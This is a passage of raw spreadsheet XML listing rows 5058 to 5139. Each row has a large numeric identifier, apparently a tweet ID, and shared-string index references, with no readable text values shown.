    <row r="5058" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5058">
        <v>1.23431132392993E+18</v>
      </c>
      <c r="B5058" t="s">
        <v>12523</v>
      </c>
      <c r="C5058" t="s">
        <v>1</v>
      </c>
      <c r="D5058" t="s">
        <v>4032</v>
      </c>
      <c r="E5058" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5059" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5059">
        <v>1.2343113205955699E+18</v>
      </c>
      <c r="B5059" t="s">
        <v>12524</v>
      </c>
      <c r="C5059" t="s">
        <v>1</v>
      </c>
      <c r="D5059" t="s">
        <v>6958</v>
      </c>
      <c r="E5059" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5060" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5060">
        <v>1.2343113189010501E+18</v>
      </c>
      <c r="B5060" t="s">
        <v>12524</v>
      </c>
      <c r="C5060" t="s">
        <v>1</v>
      </c>
      <c r="D5060" t="s">
        <v>854</v>
      </c>
      <c r="E5060" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5061" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5061">
        <v>1.23431131646831E+18</v>
      </c>
      <c r="B5061" t="s">
        <v>12525</v>
      </c>
      <c r="C5061" t="s">
        <v>1</v>
      </c>
      <c r="D5061" t="s">
        <v>855</v>
      </c>
      <c r="E5061" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5062" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5062">
        <v>1.23431131515969E+18</v>
      </c>
      <c r="B5062" t="s">
        <v>12525</v>
      </c>
      <c r="C5062" t="s">
        <v>1</v>
      </c>
      <c r="D5062" t="s">
        <v>4035</v>
      </c>
      <c r="E5062" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5063" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5063">
        <v>1.2343113125970401E+18</v>
      </c>
      <c r="B5063" t="s">
        <v>12526</v>
      </c>
      <c r="C5063" t="s">
        <v>1</v>
      </c>
      <c r="D5063" t="s">
        <v>857</v>
      </c>
      <c r="E5063" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5064" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5064">
        <v>1.2343113093087099E+18</v>
      </c>
      <c r="B5064" t="s">
        <v>12526</v>
      </c>
      <c r="C5064" t="s">
        <v>1</v>
      </c>
      <c r="D5064" t="s">
        <v>6964</v>
      </c>
      <c r="E5064" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5065" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5065">
        <v>1.2343113032017999E+18</v>
      </c>
      <c r="B5065" t="s">
        <v>12527</v>
      </c>
      <c r="C5065" t="s">
        <v>1</v>
      </c>
      <c r="D5065" t="s">
        <v>861</v>
      </c>
      <c r="E5065" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5066" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5066">
        <v>1.2343112993178501E+18</v>
      </c>
      <c r="B5066" t="s">
        <v>12528</v>
      </c>
      <c r="C5066" t="s">
        <v>1</v>
      </c>
      <c r="D5066" t="s">
        <v>864</v>
      </c>
      <c r="E5066" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5067" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5067">
        <v>1.23431129678863E+18</v>
      </c>
      <c r="B5067" t="s">
        <v>12528</v>
      </c>
      <c r="C5067" t="s">
        <v>1</v>
      </c>
      <c r="D5067" t="s">
        <v>867</v>
      </c>
      <c r="E5067" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5068" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5068">
        <v>1.23431129354643E+18</v>
      </c>
      <c r="B5068" t="s">
        <v>12529</v>
      </c>
      <c r="C5068" t="s">
        <v>1</v>
      </c>
      <c r="D5068" t="s">
        <v>869</v>
      </c>
      <c r="E5068" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5069" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5069">
        <v>1.23431129192739E+18</v>
      </c>
      <c r="B5069" t="s">
        <v>12529</v>
      </c>
      <c r="C5069" t="s">
        <v>1</v>
      </c>
      <c r="D5069" t="s">
        <v>4044</v>
      </c>
      <c r="E5069" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5070" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5070">
        <v>1.2343112905475E+18</v>
      </c>
      <c r="B5070" t="s">
        <v>12530</v>
      </c>
      <c r="C5070" t="s">
        <v>1</v>
      </c>
      <c r="D5070" t="s">
        <v>871</v>
      </c>
      <c r="E5070" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5071" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5071">
        <v>1.2343112884210401E+18</v>
      </c>
      <c r="B5071" t="s">
        <v>12530</v>
      </c>
      <c r="C5071" t="s">
        <v>1</v>
      </c>
      <c r="D5071" t="s">
        <v>873</v>
      </c>
      <c r="E5071" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5072" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5072">
        <v>1.2343112865210199E+18</v>
      </c>
      <c r="B5072" t="s">
        <v>12531</v>
      </c>
      <c r="C5072" t="s">
        <v>1</v>
      </c>
      <c r="D5072" t="s">
        <v>875</v>
      </c>
      <c r="E5072" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5073" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5073">
        <v>1.23431128252385E+18</v>
      </c>
      <c r="B5073" t="s">
        <v>12532</v>
      </c>
      <c r="C5073" t="s">
        <v>1</v>
      </c>
      <c r="D5073" t="s">
        <v>877</v>
      </c>
      <c r="E5073" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5074" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5074">
        <v>1.2343112807286899E+18</v>
      </c>
      <c r="B5074" t="s">
        <v>12532</v>
      </c>
      <c r="C5074" t="s">
        <v>1</v>
      </c>
      <c r="D5074" t="s">
        <v>879</v>
      </c>
      <c r="E5074" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5075" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5075">
        <v>1.2343112788831501E+18</v>
      </c>
      <c r="B5075" t="s">
        <v>12533</v>
      </c>
      <c r="C5075" t="s">
        <v>1</v>
      </c>
      <c r="D5075" t="s">
        <v>880</v>
      </c>
      <c r="E5075" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5076" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5076">
        <v>1.23431127731875E+18</v>
      </c>
      <c r="B5076" t="s">
        <v>12533</v>
      </c>
      <c r="C5076" t="s">
        <v>1</v>
      </c>
      <c r="D5076" t="s">
        <v>882</v>
      </c>
      <c r="E5076" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5077" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5077">
        <v>1.23431124191443E+18</v>
      </c>
      <c r="B5077" t="s">
        <v>12534</v>
      </c>
      <c r="C5077" t="s">
        <v>1</v>
      </c>
      <c r="D5077" t="s">
        <v>12535</v>
      </c>
      <c r="E5077" t="s">
        <v>4829</v>
      </c>
    </row>
    <row r="5078" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5078">
        <v>1.2343103794565601E+18</v>
      </c>
      <c r="B5078" t="s">
        <v>12536</v>
      </c>
      <c r="C5078" t="s">
        <v>1</v>
      </c>
      <c r="D5078" t="s">
        <v>12537</v>
      </c>
      <c r="E5078" t="s">
        <v>938</v>
      </c>
    </row>
    <row r="5079" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5079">
        <v>1.2343072733143301E+18</v>
      </c>
      <c r="B5079" t="s">
        <v>12538</v>
      </c>
      <c r="C5079" t="s">
        <v>1</v>
      </c>
      <c r="D5079" t="s">
        <v>12539</v>
      </c>
      <c r="E5079" t="s">
        <v>12540</v>
      </c>
    </row>
    <row r="5080" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5080">
        <v>1.23430492165615E+18</v>
      </c>
      <c r="B5080" t="s">
        <v>12541</v>
      </c>
      <c r="C5080" t="s">
        <v>1</v>
      </c>
      <c r="D5080" t="s">
        <v>12542</v>
      </c>
      <c r="E5080" t="s">
        <v>3893</v>
      </c>
    </row>
    <row r="5081" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5081">
        <v>1.2343048972369101E+18</v>
      </c>
      <c r="B5081" t="s">
        <v>12543</v>
      </c>
      <c r="C5081" t="s">
        <v>1</v>
      </c>
      <c r="D5081" t="s">
        <v>12544</v>
      </c>
      <c r="E5081" t="s">
        <v>123</v>
      </c>
    </row>
    <row r="5082" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5082">
        <v>1.23430306524882E+18</v>
      </c>
      <c r="B5082" t="s">
        <v>12545</v>
      </c>
      <c r="C5082" t="s">
        <v>1</v>
      </c>
      <c r="D5082" t="s">
        <v>12546</v>
      </c>
      <c r="E5082" t="s">
        <v>12547</v>
      </c>
    </row>
    <row r="5083" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5083">
        <v>1.23430205323891E+18</v>
      </c>
      <c r="B5083" t="s">
        <v>12548</v>
      </c>
      <c r="C5083" t="s">
        <v>1</v>
      </c>
      <c r="D5083" t="s">
        <v>12549</v>
      </c>
      <c r="E5083" t="s">
        <v>12550</v>
      </c>
    </row>
    <row r="5084" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5084">
        <v>1.23429990664865E+18</v>
      </c>
      <c r="B5084" t="s">
        <v>12551</v>
      </c>
      <c r="C5084" t="s">
        <v>1</v>
      </c>
      <c r="D5084" t="s">
        <v>12552</v>
      </c>
      <c r="E5084" t="s">
        <v>12553</v>
      </c>
    </row>
    <row r="5085" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5085">
        <v>1.2342998999837499E+18</v>
      </c>
      <c r="B5085" t="s">
        <v>12554</v>
      </c>
      <c r="C5085" t="s">
        <v>1</v>
      </c>
      <c r="D5085" t="s">
        <v>12555</v>
      </c>
      <c r="E5085" t="s">
        <v>12556</v>
      </c>
    </row>
    <row r="5086" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5086">
        <v>1.23429847752767E+18</v>
      </c>
      <c r="B5086" t="s">
        <v>12557</v>
      </c>
      <c r="C5086" t="s">
        <v>1</v>
      </c>
      <c r="D5086" t="s">
        <v>12558</v>
      </c>
      <c r="E5086" t="s">
        <v>6840</v>
      </c>
    </row>
    <row r="5087" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5087">
        <v>1.23429838465313E+18</v>
      </c>
      <c r="B5087" t="s">
        <v>12559</v>
      </c>
      <c r="C5087" t="s">
        <v>1</v>
      </c>
      <c r="D5087" t="s">
        <v>12560</v>
      </c>
      <c r="E5087" t="s">
        <v>6861</v>
      </c>
    </row>
    <row r="5088" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5088">
        <v>1.2342979537848599E+18</v>
      </c>
      <c r="B5088" t="s">
        <v>12561</v>
      </c>
      <c r="C5088" t="s">
        <v>1</v>
      </c>
      <c r="D5088" t="s">
        <v>12562</v>
      </c>
      <c r="E5088" t="s">
        <v>12563</v>
      </c>
    </row>
    <row r="5089" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5089">
        <v>1.23429760177377E+18</v>
      </c>
      <c r="B5089" t="s">
        <v>12564</v>
      </c>
      <c r="C5089" t="s">
        <v>1</v>
      </c>
      <c r="D5089" t="s">
        <v>12565</v>
      </c>
      <c r="E5089" t="s">
        <v>12566</v>
      </c>
    </row>
    <row r="5090" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5090">
        <v>1.2342974534421499E+18</v>
      </c>
      <c r="B5090" t="s">
        <v>12567</v>
      </c>
      <c r="C5090" t="s">
        <v>1</v>
      </c>
      <c r="D5090" t="s">
        <v>12568</v>
      </c>
      <c r="E5090" t="s">
        <v>12569</v>
      </c>
    </row>
    <row r="5091" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5091">
        <v>1.2342971663712399E+18</v>
      </c>
      <c r="B5091" t="s">
        <v>12570</v>
      </c>
      <c r="C5091" t="s">
        <v>1</v>
      </c>
      <c r="D5091" t="s">
        <v>12571</v>
      </c>
      <c r="E5091" t="s">
        <v>12572</v>
      </c>
    </row>
    <row r="5092" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5092">
        <v>1.2342965249952699E+18</v>
      </c>
      <c r="B5092" t="s">
        <v>12573</v>
      </c>
      <c r="C5092" t="s">
        <v>1</v>
      </c>
      <c r="D5092" t="s">
        <v>12574</v>
      </c>
      <c r="E5092" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5093" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5093">
        <v>1.2342936719583201E+18</v>
      </c>
      <c r="B5093" t="s">
        <v>12576</v>
      </c>
      <c r="C5093" t="s">
        <v>1</v>
      </c>
      <c r="D5093" t="s">
        <v>12577</v>
      </c>
      <c r="E5093" t="s">
        <v>12578</v>
      </c>
    </row>
    <row r="5094" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5094">
        <v>1.23429359273635E+18</v>
      </c>
      <c r="B5094" t="s">
        <v>12579</v>
      </c>
      <c r="C5094" t="s">
        <v>1</v>
      </c>
      <c r="D5094" t="s">
        <v>12580</v>
      </c>
      <c r="E5094" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5095" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5095">
        <v>1.2342935100372101E+18</v>
      </c>
      <c r="B5095" t="s">
        <v>12581</v>
      </c>
      <c r="C5095" t="s">
        <v>1</v>
      </c>
      <c r="D5095" t="s">
        <v>12582</v>
      </c>
      <c r="E5095" t="s">
        <v>12583</v>
      </c>
    </row>
    <row r="5096" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5096">
        <v>1.2342934656949399E+18</v>
      </c>
      <c r="B5096" t="s">
        <v>12584</v>
      </c>
      <c r="C5096" t="s">
        <v>1</v>
      </c>
      <c r="D5096" t="s">
        <v>12585</v>
      </c>
      <c r="E5096" t="s">
        <v>12586</v>
      </c>
    </row>
    <row r="5097" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5097">
        <v>1.23429294136911E+18</v>
      </c>
      <c r="B5097" t="s">
        <v>12587</v>
      </c>
      <c r="C5097" t="s">
        <v>1</v>
      </c>
      <c r="D5097" t="s">
        <v>12588</v>
      </c>
      <c r="E5097" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5098" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5098">
        <v>1.2342921023197499E+18</v>
      </c>
      <c r="B5098" t="s">
        <v>12589</v>
      </c>
      <c r="C5098" t="s">
        <v>1</v>
      </c>
      <c r="D5098" t="s">
        <v>12590</v>
      </c>
      <c r="E5098" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5099" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5099">
        <v>1.23429134598189E+18</v>
      </c>
      <c r="B5099" t="s">
        <v>12591</v>
      </c>
      <c r="C5099" t="s">
        <v>1</v>
      </c>
      <c r="D5099" t="s">
        <v>12592</v>
      </c>
      <c r="E5099" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5100" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5100">
        <v>1.2342906010861399E+18</v>
      </c>
      <c r="B5100" t="s">
        <v>12593</v>
      </c>
      <c r="C5100" t="s">
        <v>1</v>
      </c>
      <c r="D5100" t="s">
        <v>12594</v>
      </c>
      <c r="E5100" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5101" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5101">
        <v>1.23429020133519E+18</v>
      </c>
      <c r="B5101" t="s">
        <v>12595</v>
      </c>
      <c r="C5101" t="s">
        <v>1</v>
      </c>
      <c r="D5101" t="s">
        <v>12596</v>
      </c>
      <c r="E5101" t="s">
        <v>1105</v>
      </c>
    </row>
    <row r="5102" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5102">
        <v>1.2342898192971699E+18</v>
      </c>
      <c r="B5102" t="s">
        <v>12597</v>
      </c>
      <c r="C5102" t="s">
        <v>1</v>
      </c>
      <c r="D5102" t="s">
        <v>12598</v>
      </c>
      <c r="E5102" t="s">
        <v>11835</v>
      </c>
    </row>
    <row r="5103" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5103">
        <v>1.23428974925647E+18</v>
      </c>
      <c r="B5103" t="s">
        <v>12599</v>
      </c>
      <c r="C5103" t="s">
        <v>1</v>
      </c>
      <c r="D5103" t="s">
        <v>12600</v>
      </c>
      <c r="E5103" t="s">
        <v>12575</v>
      </c>
    </row>
    <row r="5104" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5104">
        <v>1.23428947184527E+18</v>
      </c>
      <c r="B5104" t="s">
        <v>12601</v>
      </c>
      <c r="C5104" t="s">
        <v>1</v>
      </c>
      <c r="D5104" t="s">
        <v>12602</v>
      </c>
      <c r="E5104" t="s">
        <v>12603</v>
      </c>
    </row>
    <row r="5105" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5105">
        <v>1.2342876836832699E+18</v>
      </c>
      <c r="B5105" t="s">
        <v>12604</v>
      </c>
      <c r="C5105" t="s">
        <v>1</v>
      </c>
      <c r="D5105" t="s">
        <v>12605</v>
      </c>
      <c r="E5105" t="s">
        <v>12606</v>
      </c>
    </row>
    <row r="5106" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5106">
        <v>1.2342865218232801E+18</v>
      </c>
      <c r="B5106" t="s">
        <v>12607</v>
      </c>
      <c r="C5106" t="s">
        <v>1</v>
      </c>
      <c r="D5106" t="s">
        <v>12608</v>
      </c>
      <c r="E5106" t="s">
        <v>12609</v>
      </c>
    </row>
    <row r="5107" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5107">
        <v>1.23428481045917E+18</v>
      </c>
      <c r="B5107" t="s">
        <v>12610</v>
      </c>
      <c r="C5107" t="s">
        <v>1</v>
      </c>
      <c r="D5107" t="s">
        <v>12611</v>
      </c>
      <c r="E5107" t="s">
        <v>12612</v>
      </c>
    </row>
    <row r="5108" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5108">
        <v>1.23428233507757E+18</v>
      </c>
      <c r="B5108" t="s">
        <v>12613</v>
      </c>
      <c r="C5108" t="s">
        <v>1</v>
      </c>
      <c r="D5108" t="s">
        <v>12614</v>
      </c>
      <c r="E5108" t="s">
        <v>248</v>
      </c>
    </row>
    <row r="5109" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5109">
        <v>1.2342822727082601E+18</v>
      </c>
      <c r="B5109" t="s">
        <v>12615</v>
      </c>
      <c r="C5109" t="s">
        <v>1</v>
      </c>
      <c r="D5109" t="s">
        <v>12616</v>
      </c>
      <c r="E5109" t="s">
        <v>4178</v>
      </c>
    </row>
    <row r="5110" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5110">
        <v>1.23428227186946E+18</v>
      </c>
      <c r="B5110" t="s">
        <v>12615</v>
      </c>
      <c r="C5110" t="s">
        <v>1</v>
      </c>
      <c r="D5110" t="s">
        <v>12617</v>
      </c>
      <c r="E5110" t="s">
        <v>1208</v>
      </c>
    </row>
    <row r="5111" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5111">
        <v>1.23428014000942E+18</v>
      </c>
      <c r="B5111" t="s">
        <v>12618</v>
      </c>
      <c r="C5111" t="s">
        <v>1</v>
      </c>
      <c r="D5111" t="s">
        <v>12619</v>
      </c>
      <c r="E5111" t="s">
        <v>5026</v>
      </c>
    </row>
    <row r="5112" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5112">
        <v>1.2342796485252101E+18</v>
      </c>
      <c r="B5112" t="s">
        <v>12620</v>
      </c>
      <c r="C5112" t="s">
        <v>1</v>
      </c>
      <c r="D5112" t="s">
        <v>4199</v>
      </c>
      <c r="E5112" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5113" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5113">
        <v>1.2342796454675899E+18</v>
      </c>
      <c r="B5113" t="s">
        <v>12621</v>
      </c>
      <c r="C5113" t="s">
        <v>1</v>
      </c>
      <c r="D5113" t="s">
        <v>1073</v>
      </c>
      <c r="E5113" t="s">
        <v>829</v>
      </c>
    </row>
    <row r="5114" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5114">
        <v>1.23427572605825E+18</v>
      </c>
      <c r="B5114" t="s">
        <v>12622</v>
      </c>
      <c r="C5114" t="s">
        <v>1</v>
      </c>
      <c r="D5114" t="s">
        <v>12623</v>
      </c>
      <c r="E5114" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="5115" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5115">
        <v>1.2342753616277499E+18</v>
      </c>
      <c r="B5115" t="s">
        <v>12624</v>
      </c>
      <c r="C5115" t="s">
        <v>1</v>
      </c>
      <c r="D5115" t="s">
        <v>12625</v>
      </c>
      <c r="E5115" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="5116" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5116">
        <v>1.23427368156157E+18</v>
      </c>
      <c r="B5116" t="s">
        <v>12626</v>
      </c>
      <c r="C5116" t="s">
        <v>1</v>
      </c>
      <c r="D5116" t="s">
        <v>12627</v>
      </c>
      <c r="E5116" t="s">
        <v>12628</v>
      </c>
    </row>
    <row r="5117" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5117">
        <v>1.23427129957858E+18</v>
      </c>
      <c r="B5117" t="s">
        <v>12629</v>
      </c>
      <c r="C5117" t="s">
        <v>1</v>
      </c>
      <c r="D5117" t="s">
        <v>12630</v>
      </c>
      <c r="E5117" t="s">
        <v>6601</v>
      </c>
    </row>
    <row r="5118" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5118">
        <v>1.2342700316488699E+18</v>
      </c>
      <c r="B5118" t="s">
        <v>12631</v>
      </c>
      <c r="C5118" t="s">
        <v>1</v>
      </c>
      <c r="D5118" t="s">
        <v>12632</v>
      </c>
      <c r="E5118" t="s">
        <v>12633</v>
      </c>
    </row>
    <row r="5119" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5119">
        <v>1.2342696508186701E+18</v>
      </c>
      <c r="B5119" t="s">
        <v>12634</v>
      </c>
      <c r="C5119" t="s">
        <v>1</v>
      </c>
      <c r="D5119" t="s">
        <v>12635</v>
      </c>
      <c r="E5119" t="s">
        <v>390</v>
      </c>
    </row>
    <row r="5120" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5120">
        <v>1.23426932919506E+18</v>
      </c>
      <c r="B5120" t="s">
        <v>12636</v>
      </c>
      <c r="C5120" t="s">
        <v>1</v>
      </c>
      <c r="D5120" t="s">
        <v>12637</v>
      </c>
      <c r="E5120" t="s">
        <v>12638</v>
      </c>
    </row>
    <row r="5121" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5121">
        <v>1.23426920239713E+18</v>
      </c>
      <c r="B5121" t="s">
        <v>12639</v>
      </c>
      <c r="C5121" t="s">
        <v>1</v>
      </c>
      <c r="D5121" t="s">
        <v>12640</v>
      </c>
      <c r="E5121" t="s">
        <v>12641</v>
      </c>
    </row>
    <row r="5122" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5122">
        <v>1.2342690706793101E+18</v>
      </c>
      <c r="B5122" t="s">
        <v>12642</v>
      </c>
      <c r="C5122" t="s">
        <v>1</v>
      </c>
      <c r="D5122" t="s">
        <v>12643</v>
      </c>
      <c r="E5122" t="s">
        <v>12641</v>
      </c>
    </row>
    <row r="5123" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5123">
        <v>1.23426847380051E+18</v>
      </c>
      <c r="B5123" t="s">
        <v>12644</v>
      </c>
      <c r="C5123" t="s">
        <v>1</v>
      </c>
      <c r="D5123" t="s">
        <v>12645</v>
      </c>
      <c r="E5123" t="s">
        <v>12646</v>
      </c>
    </row>
    <row r="5124" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5124">
        <v>1.23426727097475E+18</v>
      </c>
      <c r="B5124" t="s">
        <v>12647</v>
      </c>
      <c r="C5124" t="s">
        <v>1</v>
      </c>
      <c r="D5124" t="s">
        <v>12648</v>
      </c>
      <c r="E5124" t="s">
        <v>12649</v>
      </c>
    </row>
    <row r="5125" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5125">
        <v>1.2342672397901299E+18</v>
      </c>
      <c r="B5125" t="s">
        <v>12650</v>
      </c>
      <c r="C5125" t="s">
        <v>1</v>
      </c>
      <c r="D5125" t="s">
        <v>12651</v>
      </c>
      <c r="E5125" t="s">
        <v>12652</v>
      </c>
    </row>
    <row r="5126" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5126">
        <v>1.2342672316866601E+18</v>
      </c>
      <c r="B5126" t="s">
        <v>12653</v>
      </c>
      <c r="C5126" t="s">
        <v>1</v>
      </c>
      <c r="D5126" t="s">
        <v>12654</v>
      </c>
      <c r="E5126" t="s">
        <v>12655</v>
      </c>
    </row>
    <row r="5127" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5127">
        <v>1.23426722310927E+18</v>
      </c>
      <c r="B5127" t="s">
        <v>12656</v>
      </c>
      <c r="C5127" t="s">
        <v>1</v>
      </c>
      <c r="D5127" t="s">
        <v>12657</v>
      </c>
      <c r="E5127" t="s">
        <v>12658</v>
      </c>
    </row>
    <row r="5128" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5128">
        <v>1.23426639920528E+18</v>
      </c>
      <c r="B5128" t="s">
        <v>12659</v>
      </c>
      <c r="C5128" t="s">
        <v>1</v>
      </c>
      <c r="D5128" t="s">
        <v>12660</v>
      </c>
      <c r="E5128" t="s">
        <v>4246</v>
      </c>
    </row>
    <row r="5129" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5129">
        <v>1.2342656629163699E+18</v>
      </c>
      <c r="B5129" t="s">
        <v>12661</v>
      </c>
      <c r="C5129" t="s">
        <v>1</v>
      </c>
      <c r="D5129" t="s">
        <v>12662</v>
      </c>
      <c r="E5129" t="s">
        <v>12663</v>
      </c>
    </row>
    <row r="5130" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5130">
        <v>1.2342650677277901E+18</v>
      </c>
      <c r="B5130" t="s">
        <v>12664</v>
      </c>
      <c r="C5130" t="s">
        <v>1</v>
      </c>
      <c r="D5130" t="s">
        <v>12665</v>
      </c>
      <c r="E5130" t="s">
        <v>12666</v>
      </c>
    </row>
    <row r="5131" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5131">
        <v>1.2342614661544801E+18</v>
      </c>
      <c r="B5131" t="s">
        <v>12667</v>
      </c>
      <c r="C5131" t="s">
        <v>1</v>
      </c>
      <c r="D5131" t="s">
        <v>12668</v>
      </c>
      <c r="E5131" t="s">
        <v>12669</v>
      </c>
    </row>
    <row r="5132" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5132">
        <v>1.23426061030672E+18</v>
      </c>
      <c r="B5132" t="s">
        <v>12670</v>
      </c>
      <c r="C5132" t="s">
        <v>1</v>
      </c>
      <c r="D5132" t="s">
        <v>12671</v>
      </c>
      <c r="E5132" t="s">
        <v>12672</v>
      </c>
    </row>
    <row r="5133" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5133">
        <v>1.2342605806362501E+18</v>
      </c>
      <c r="B5133" t="s">
        <v>12673</v>
      </c>
      <c r="C5133" t="s">
        <v>1</v>
      </c>
      <c r="D5133" t="s">
        <v>12674</v>
      </c>
      <c r="E5133" t="s">
        <v>1102</v>
      </c>
    </row>
    <row r="5134" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5134">
        <v>1.2342599106087601E+18</v>
      </c>
      <c r="B5134" t="s">
        <v>12675</v>
      </c>
      <c r="C5134" t="s">
        <v>1</v>
      </c>
      <c r="D5134" t="s">
        <v>12676</v>
      </c>
      <c r="E5134" t="s">
        <v>12677</v>
      </c>
    </row>
    <row r="5135" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5135">
        <v>1.23425988907523E+18</v>
      </c>
      <c r="B5135" t="s">
        <v>12678</v>
      </c>
      <c r="C5135" t="s">
        <v>1</v>
      </c>
      <c r="D5135" t="s">
        <v>12679</v>
      </c>
      <c r="E5135" t="s">
        <v>454</v>
      </c>
    </row>
    <row r="5136" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5136">
        <v>1.2342593063898701E+18</v>
      </c>
      <c r="B5136" t="s">
        <v>12680</v>
      </c>
      <c r="C5136" t="s">
        <v>1</v>
      </c>
      <c r="D5136" t="s">
        <v>12681</v>
      </c>
      <c r="E5136" t="s">
        <v>12682</v>
      </c>
    </row>
    <row r="5137" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5137">
        <v>1.2342578601350899E+18</v>
      </c>
      <c r="B5137" t="s">
        <v>12683</v>
      </c>
      <c r="C5137" t="s">
        <v>1</v>
      </c>
      <c r="D5137" t="s">
        <v>12684</v>
      </c>
      <c r="E5137" t="s">
        <v>12685</v>
      </c>
    </row>
    <row r="5138" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5138">
        <v>1.2342558665824499E+18</v>
      </c>
      <c r="B5138" t="s">
        <v>12686</v>
      </c>
      <c r="C5138" t="s">
        <v>1</v>
      </c>
      <c r="D5138" t="s">
        <v>12687</v>
      </c>
      <c r="E5138" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="5139" spans="1:5" x14ac:dyDescent="0.25">
      <c r="A5139">
        <v>1.23425450108051E+18</v>
      </c>
      <c r="B5139" t="s">
        <v>12688</v>
      </c>
